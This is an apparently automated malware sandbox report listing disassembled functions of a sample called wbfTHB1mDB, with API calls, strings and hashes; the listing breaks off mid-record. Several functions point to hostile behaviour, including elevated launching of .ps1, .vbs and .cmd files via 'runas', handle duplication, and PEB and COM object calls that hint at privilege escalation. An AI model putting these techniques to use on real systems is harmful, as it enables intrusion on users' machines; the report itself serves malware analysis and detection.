Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 90e282629e3327800b1a09ea2473f0e2941ce1167cc6a0942764be9094e0e12c
Instruction ID: 5decfd2c8ac8169660a194cdf1a606b03f8e42c640677a015df312412254949c
Opcode Fuzzy Hash: 90e282629e3327800b1a09ea2473f0e2941ce1167cc6a0942764be9094e0e12c
Instruction Fuzzy Hash: 5D310232294601C7FB116FA5CC003EDB6D0A786F98F42C226EA65037D2CF78C64997B4

Function 0000018C89ACE208 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000018C89ACE22B

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c41a516aab5bbd5a0cb5ee3d8915c07e5e449c965519035ee3790c186b832703
Instruction ID: 837c7e07d71917f6a12ed073209f73fbdef25b57d4e7857e9b8612a72158ecca
Opcode Fuzzy Hash: c41a516aab5bbd5a0cb5ee3d8915c07e5e449c965519035ee3790c186b832703
Instruction Fuzzy Hash: 54219632254A4087EBA18F18D4413F976A1F786F58F25C224E7594B6D9DF39CE08CB50

Function 0000018C89ACC510 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000018C89ACC46D

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6080b6f5c7735027f4532a4154f17099be5a1c2b37b88469d38b788aa2f2ab04
Instruction ID: 89a755865f15a9862defebd4020326139fc693ff465bd36d1d93e1fbd66cf142
Opcode Fuzzy Hash: 6080b6f5c7735027f4532a4154f17099be5a1c2b37b88469d38b788aa2f2ab04
Instruction Fuzzy Hash: 0D11B431648640D2EA609F51D9043FDA2B0F787F88F45C821EB895BA86CF3DC64587E4

Function 0000018C89A8ADC0 Relevance: 1.5, APIs: 1, Instructions: 38networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 0000018C89A8AE08

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: af342f55a76444dc29af71e8fb4152a83f454f5b800a0383b076c9e997804f61
Instruction ID: 9237e1232136e604f4f026936b84eb786fea7000a0db92764a65c0e479883964
Opcode Fuzzy Hash: af342f55a76444dc29af71e8fb4152a83f454f5b800a0383b076c9e997804f61
Instruction Fuzzy Hash: F101A231714A9482DB508F1AB5402D9A3A0F789BD4F48D130EF5D43F48DF38C9558740

Function 0000018C89A458F3 Relevance: 1.5, APIs: 1, Instructions: 33fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32 ref: 0000018C89A45936

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: c09ff1b7f36846cd2f70e20038cef65db65028f9499b4e4cc306786389cb5efe
Instruction ID: 54d37aa065b008130c2be6f90ba61cfc5696500a6bb22226352d1db905a2344d
Opcode Fuzzy Hash: c09ff1b7f36846cd2f70e20038cef65db65028f9499b4e4cc306786389cb5efe
Instruction Fuzzy Hash: 20016236258A8085EA70CB56F8543DB7364F7C9B94F808023CE8D43B59DF38C98ACB40

Function 0000018C89A9ED2C Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000018C89A9ED4B

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8baf8acf487f5caa78a15ef12004ef049afcc069522c3c2ef46e844b516c0117
Instruction ID: 08e57d21db6bd725ada9bb3f41195481ebab1ba8bf96fb55c7bead84cf25b51b
Opcode Fuzzy Hash: 8baf8acf487f5caa78a15ef12004ef049afcc069522c3c2ef46e844b516c0117
Instruction Fuzzy Hash: 2AE092312596418AEF256BA5E5413FCB1A4EB05BB0F24C721A734067CADE3985684761

Function 0000018C89AC97D0 Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32 ref: 0000018C89AC97D4

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 4177796e15072c585db232ab642f29accb6d05ea1f689265af403d42f2bb1474
Instruction ID: e856e782e0802324c29c4cc716e957bd7dd8e4be6fc351c8bdee774abeee6435
Opcode Fuzzy Hash: 4177796e15072c585db232ab642f29accb6d05ea1f689265af403d42f2bb1474
Instruction Fuzzy Hash: 10C04C35F96505C1EA541B625C422CA21907756700F40C024C60484150DD7C839A4761

Function 0000018C89ACB3C4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32 ref: 0000018C89ACB3CD

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 5d96549d17151685d9874b2efd5e6665c09aeaad6767ec6861ada1b691878f94
Instruction ID: b535fe09dbdba04933ef2f6c88524f4aed5c6f9b84adcae97e8f13673009fcc3
Opcode Fuzzy Hash: 5d96549d17151685d9874b2efd5e6665c09aeaad6767ec6861ada1b691878f94
Instruction Fuzzy Hash: CEB09236A548C0C3C612EB04E8420897331F795B0CFD08000E68D42628CE2CCA2A8F00

Function 0000018C89AABBB8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 0000018C89AABC0D

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 735fdacdf537e6d17f030f13e349f9107f2389d02998886e9996cc406814ac26
Instruction ID: c81b8adf096efa9fc494899e376a53f821a3fc2af91d0e6d4d98fd488dcb6a2b
Opcode Fuzzy Hash: 735fdacdf537e6d17f030f13e349f9107f2389d02998886e9996cc406814ac26
Instruction Fuzzy Hash: 22F0907038134596FE595BA298153E5A2D06BCBB80F0CC431DE0A963D2DE7CCB8D83B0

Function 0000018C89AADEDC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 0000018C89AADF1A

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: ad1b43cdb7c3550550fd4afa13c905d117ea5c1f34bfd66f5f885cc22fb7391c
Instruction ID: 7d7445cf9e78093a08ce523682a754f01c864af5d35eaefc53718d1e423acc45
Opcode Fuzzy Hash: ad1b43cdb7c3550550fd4afa13c905d117ea5c1f34bfd66f5f885cc22fb7391c
Instruction Fuzzy Hash: 15F0A07039524596FE681BB1A8003FEA2E06B477A0F09C7306D6686AC1DE7CC64883B0

Function 00007FF6A7062B48 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6A706C651,?,?,00000000,00007FF6A706BF97,?,?,?,00007FF6A706A29F,?,?,?,00007FF6A706A195), ref: 00007FF6A7062B86

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5c270841806ca0d65908707fc072f6ad565d7e89aec5f4c22d169a1f53078808
Instruction ID: ee926199f2e2d09b623f81ddee55eaed09aee62ea839dcf5d5a39af25ed5321f
Opcode Fuzzy Hash: 5c270841806ca0d65908707fc072f6ad565d7e89aec5f4c22d169a1f53078808
Instruction Fuzzy Hash: 74F058C0F4F34748FE546FA158617B5A2848F89BA0F085630DA2EC52C2DEACE6E08219

Non-executed Functions

Function 0000018C89A943F0 Relevance: 34.3, APIs: 18, Strings: 1, Instructions: 1015stringmemorynativeCOMMON

Download Yara Rule

APIs

RtlAcquirePebLock.NTDLL ref: 0000018C89A94433
NtAllocateVirtualMemory.NTDLL ref: 0000018C89A9446B
lstrcpyW.KERNEL32 ref: 0000018C89A944CD
lstrcatW.KERNEL32 ref: 0000018C89A94582
NtAllocateVirtualMemory.NTDLL ref: 0000018C89A94609
lstrcpyW.KERNEL32 ref: 0000018C89A946BC
RtlInitUnicodeString.NTDLL ref: 0000018C89A946D1
RtlInitUnicodeString.NTDLL ref: 0000018C89A946E6
LdrEnumerateLoadedModules.NTDLL ref: 0000018C89A946F9
RtlReleasePebLock.NTDLL ref: 0000018C89A946FF

Part of subcall function 0000018C89A88E10: SHGetKnownFolderPath.SHELL32 ref: 0000018C89A88E69
Part of subcall function 0000018C89A88E10: CoTaskMemFree.OLE32 ref: 0000018C89A88F2A

CoInitializeEx.OLE32 ref: 0000018C89A947AA
lstrcpyW.KERNEL32 ref: 0000018C89A94989
lstrcatW.KERNEL32 ref: 0000018C89A94B8E
CoGetObject.OLE32 ref: 0000018C89A94BAC
lstrcpyW.KERNEL32 ref: 0000018C89A95229
lstrcatW.KERNEL32 ref: 0000018C89A9544C
CoGetObject.OLE32 ref: 0000018C89A9546A
CoUninitialize.OLE32 ref: 0000018C89A95932

Strings

0, xrefs: 0000018C89A9506A

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AllocateInitLockMemoryObjectStringUnicodeVirtual$AcquireEnumerateFolderFreeInitializeKnownLoadedModulesPathReleaseTaskUninitialize
String ID: 0
API String ID: 1424456515-4108050209
Opcode ID: 6849cd908a15571f28f698c4413124e6dbad4a6487f11e996cdde4f40275003f
Instruction ID: 1caa9b2f0175a02c1017d69870050ee6897252bebdaf40d70b80be629df03535
Opcode Fuzzy Hash: 6849cd908a15571f28f698c4413124e6dbad4a6487f11e996cdde4f40275003f
Instruction Fuzzy Hash: F0C2A636626F848AD7908F69E88169DB3B5F788B98F106219FECD57B18EF38C154C740

Function 0000018C89A93CF0 Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 351nativelibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000018C89A93D36
GetProcAddress.KERNEL32 ref: 0000018C89A93D46
OpenProcess.KERNEL32 ref: 0000018C89A93D78
NtQuerySystemInformation.NTDLL ref: 0000018C89A93DA0
NtQuerySystemInformation.NTDLL ref: 0000018C89A93DCE
GetCurrentProcess.KERNEL32 ref: 0000018C89A93E93
NtQueryObject.NTDLL ref: 0000018C89A93ED9
GetFinalPathNameByHandleA.KERNEL32 ref: 0000018C89A93FCD
CloseHandle.KERNEL32 ref: 0000018C89A940E8
CloseHandle.KERNEL32 ref: 0000018C89A94178

Strings

ntdll.dll, xrefs: 0000018C89A93D2F
File, xrefs: 0000018C89A93F0A
NtDuplicateObject, xrefs: 0000018C89A93D3F

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Handle$Query$CloseInformationProcessSystem$AddressCurrentFinalModuleNameObjectOpenPathProc
String ID: File$NtDuplicateObject$ntdll.dll
API String ID: 2729825427-3955674919
Opcode ID: 19a329b1698b27f6415894aedb489b4e345f624b28bb062fda18895a27a00e6b
Instruction ID: bdf649194579313086449be45f037e4427cc0fbdd9ab956f1e0d9465232f6c03
Opcode Fuzzy Hash: 19a329b1698b27f6415894aedb489b4e345f624b28bb062fda18895a27a00e6b
Instruction Fuzzy Hash: 14E1CD72B54A9089FB10CBA5D8243ED37B1F746B88F00C121DE6D1BB99DE78D6498390

Function 0000018C89A7F040 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 218COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32 ref: 0000018C89A7F09F

Strings

@, xrefs: 0000018C89A7F226

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @
API String ID: 2538663250-2766056989
Opcode ID: 28daa065bdd922f2104b70152547a23b89895abeef6d42904c205fc10f82d609
Instruction ID: ef8c22190f144741991ab4122de1dfb7281f9d2bf1ab5879366912eed01d0341
Opcode Fuzzy Hash: 28daa065bdd922f2104b70152547a23b89895abeef6d42904c205fc10f82d609
Instruction Fuzzy Hash: 8CA17D72B44B449AE720CB75E4057ED77B1F78AB88F00C215DE9A53A94DF78C258C3A4

Function 0000018C89A851E0 Relevance: 21.5, APIs: 1, Strings: 11, Instructions: 465COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32 ref: 0000018C89A85767

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+=-&^%$#@!(){}[},.;', xrefs: 0000018C89A85374
.cmd, xrefs: 0000018C89A852A3
.exe, xrefs: 0000018C89A8532D
ios_base::eofbit set, xrefs: 0000018C89A8598C
.vbs, xrefs: 0000018C89A852D2
runas, xrefs: 0000018C89A856E6
.ps1, xrefs: 0000018C89A85274
.exe, xrefs: 0000018C89A85245
ios_base::failbit set, xrefs: 0000018C89A85985
open, xrefs: 0000018C89A856DD
ios_base::badbit set, xrefs: 0000018C89A8597A

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: .cmd$.exe$.exe$.ps1$.vbs$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+=-&^%$#@!(){}[},.;'$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$open$runas
API String ID: 587946157-4093014531
Opcode ID: df2d4dabee3204ae2a58fd944dc839f708084f1b3e06dbc7e46acf9e24b3ec9d
Instruction ID: 29a0d0da04c7600361e281431a8e051c718216382089a75382faf19f7ff1782c
Opcode Fuzzy Hash: df2d4dabee3204ae2a58fd944dc839f708084f1b3e06dbc7e46acf9e24b3ec9d
Instruction Fuzzy Hash: 3022D472A50B8089EB10DF38E8403DD37A1F7867A8F50D216EE5D17AA9DF74C689C790

Function 0000018C89AB6F14 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000018C89AA81FC: GetLastError.KERNEL32 ref: 0000018C89AA820B
Part of subcall function 0000018C89AA81FC: FlsGetValue.KERNEL32 ref: 0000018C89AA8220
Part of subcall function 0000018C89AA81FC: SetLastError.KERNEL32 ref: 0000018C89AA82AB

TranslateName.LIBCMT ref: 0000018C89AB6F7E
TranslateName.LIBCMT ref: 0000018C89AB6FB9
GetACP.KERNEL32 ref: 0000018C89AB7000
IsValidCodePage.KERNEL32 ref: 0000018C89AB7038
GetLocaleInfoW.KERNEL32 ref: 0000018C89AB71F5

Strings

utf8, xrefs: 0000018C89AB711C

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
String ID: utf8
API String ID: 3069159798-905460609
Opcode ID: 4309449c26b629e9b6de698707476955217e9cbe9722d2e68f3c85218e94a805
Instruction ID: a63fe4cfef45f89d76c54d690cc8eb30793119c49e68aa9b52c1307bba1f447d
Opcode Fuzzy Hash: 4309449c26b629e9b6de698707476955217e9cbe9722d2e68f3c85218e94a805
Instruction Fuzzy Hash: 2A918D32280740AAFB649F61E8417ED23A8F747B94F44C121EE5947B96DF78CB59C3A0

Function 0000018C89AB795C Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000018C89AA81FC: GetLastError.KERNEL32 ref: 0000018C89AA820B
Part of subcall function 0000018C89AA81FC: FlsGetValue.KERNEL32 ref: 0000018C89AA8220
Part of subcall function 0000018C89AA81FC: SetLastError.KERNEL32 ref: 0000018C89AA82AB

Part of subcall function 0000018C89AA81FC: FlsSetValue.KERNEL32 ref: 0000018C89AA8241
Part of subcall function 0000018C89AA81FC: FlsGetValue.KERNEL32 ref: 0000018C89AA82E1

GetUserDefaultLCID.KERNEL32 ref: 0000018C89AB7ACC

Part of subcall function 0000018C89AA81FC: FlsSetValue.KERNEL32 ref: 0000018C89AA826E
Part of subcall function 0000018C89AA81FC: FlsSetValue.KERNEL32 ref: 0000018C89AA827F
Part of subcall function 0000018C89AA81FC: FlsSetValue.KERNEL32 ref: 0000018C89AA8290
Part of subcall function 0000018C89AA81FC: FlsSetValue.KERNEL32 ref: 0000018C89AA8300
Part of subcall function 0000018C89AA81FC: FlsSetValue.KERNEL32 ref: 0000018C89AA8328

EnumSystemLocalesW.KERNEL32 ref: 0000018C89AB7AB3
ProcessCodePage.LIBCMT ref: 0000018C89AB7AF6
IsValidCodePage.KERNEL32 ref: 0000018C89AB7B08
IsValidLocale.KERNEL32 ref: 0000018C89AB7B1E
GetLocaleInfoW.KERNEL32 ref: 0000018C89AB7B7A
GetLocaleInfoW.KERNEL32 ref: 0000018C89AB7B96

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 2591520935-0
Opcode ID: 5eb0d27aa7dc3a9912447742f13a9ce850b1caaedf69b48f01ffc0c9247ee539
Instruction ID: 1de41763599861228af1c337e8e8c6d9d6e032b5e4872717dc273c1ff3a603ff
Opcode Fuzzy Hash: 5eb0d27aa7dc3a9912447742f13a9ce850b1caaedf69b48f01ffc0c9247ee539
Instruction Fuzzy Hash: 51714832780610AEFB559B64D8547EC37A0BB4BB44F44C02A8E1953B95EFB9CB49C7A0

Function 0000018C89A74710 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 410COMMON

Download Yara Rule

APIs

__std_exception_destroy.LIBVCRUNTIME ref: 0000018C89A748C4
__std_exception_destroy.LIBVCRUNTIME ref: 0000018C89A748D2
__std_exception_destroy.LIBVCRUNTIME ref: 0000018C89A74B55
__std_exception_destroy.LIBVCRUNTIME ref: 0000018C89A74B63

Strings

value, xrefs: 0000018C89A747EA, 0000018C89A74A83

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: __std_exception_destroy
String ID: value
API String ID: 2453523683-494360628
Opcode ID: 4444f3f7fa5711b3efcd9b022b5b82c0e7cb0bff66f9b28c18b791eed25f9cf0
Instruction ID: bef3c5bdd8d698d1d8b890bfe381a7866c003b369f0e491e8d68339f8f251844
Opcode Fuzzy Hash: 4444f3f7fa5711b3efcd9b022b5b82c0e7cb0bff66f9b28c18b791eed25f9cf0
Instruction Fuzzy Hash: C5029032654BC095EB00CBB4D4853ED67A1E7877A4F50D215FAAD43AEADF78C289C390

Function 0000018C89A9F920 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000018C89A9F999
RtlLookupFunctionEntry.KERNEL32 ref: 0000018C89A9F9B1
RtlVirtualUnwind.KERNEL32 ref: 0000018C89A9F9EC
IsDebuggerPresent.KERNEL32 ref: 0000018C89A9FA25
SetUnhandledExceptionFilter.KERNEL32 ref: 0000018C89A9FA2F
UnhandledExceptionFilter.KERNEL32 ref: 0000018C89A9FA3A

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: c7f70f128318b326f672a7b0d6647dc5eb587961ea58d1b4d09a7c2ba848fd84
Instruction ID: f792a25ba87b0a2442da8fb3cfe4d826b9ae5d4ad5eb603d0a1134caa4da3831
Opcode Fuzzy Hash: c7f70f128318b326f672a7b0d6647dc5eb587961ea58d1b4d09a7c2ba848fd84
Instruction Fuzzy Hash: 3531A236254F8096DB60CF25E8503EE73A0F78A758F508126EE9D47BA9DF38C649CB50

Function 00007FF6A70600B0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6A7060129
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6A7060141
RtlVirtualUnwind.KERNEL32 ref: 00007FF6A706017C
IsDebuggerPresent.KERNEL32 ref: 00007FF6A70601B5
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6A70601BF
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6A70601CA

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 3ef0962f47fead2417061adc38ad2713cf90374c45b282237d95016c72f16019
Instruction ID: dd754d238b99840a366accb35477fc20f15c17c6bb1a6a50791c1bcd4bcd1c69
Opcode Fuzzy Hash: 3ef0962f47fead2417061adc38ad2713cf90374c45b282237d95016c72f16019
Instruction Fuzzy Hash: 00319172619F8186DB60CF25E8506AE33A4FB88758F540136EA8DC3B99EF7CD655CB00

Function 0000018C89ACBB14 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000018C89ACBB75
IsDebuggerPresent.KERNEL32 ref: 0000018C89ACBB8D
OutputDebugStringW.KERNEL32 ref: 0000018C89ACBB9E

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0000018C89ACBB97

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
Opcode ID: e8ffe009acab376759065dd43441e42d099b308a5e20a56206d0bc25ee25ae09
Instruction ID: 6a8295f92bdf06c3816ae98f8f151e088c665881a87ba137027147bd0f3041d4
Opcode Fuzzy Hash: e8ffe009acab376759065dd43441e42d099b308a5e20a56206d0bc25ee25ae09
Instruction Fuzzy Hash: F2119A32250B40A7F7148B26EA843E933A0FB45744F00C128CA4A83A65EF38D2B8C7A1

Function 0000018C89AA7348 Relevance: 6.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 0000018C89AA739F
GetSystemInfo.KERNEL32 ref: 0000018C89AA73B8
VirtualAlloc.KERNEL32 ref: 0000018C89AA7426
VirtualProtect.KERNEL32 ref: 0000018C89AA7441

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Virtual$AllocInfoProtectQuerySystem
String ID:
API String ID: 3562403962-0
Opcode ID: 324fd5cd604fef47d1152131e1f7c01459585a6c12e9a2e3e67a5e0172bc20d3
Instruction ID: 9494eaa0dbcbeb5e03aa36eb1984ec4410265d3efeabc58d4d00a2c5e4912961
Opcode Fuzzy Hash: 324fd5cd604fef47d1152131e1f7c01459585a6c12e9a2e3e67a5e0172bc20d3
Instruction Fuzzy Hash: 9B312632350A849EEB20CF35D8547DD73A5F749B88F85802AAA4D47B58DF38D64AC790

Function 0000018C89ABDC18 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000018C89ABDC44
GetCurrentThreadId.KERNEL32 ref: 0000018C89ABDC52
GetCurrentProcessId.KERNEL32 ref: 0000018C89ABDC5E
QueryPerformanceCounter.KERNEL32 ref: 0000018C89ABDC6E

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: f06392d29159ea5021ae0933302a5494cfde722d0989828b5d6bd782ea4d1856
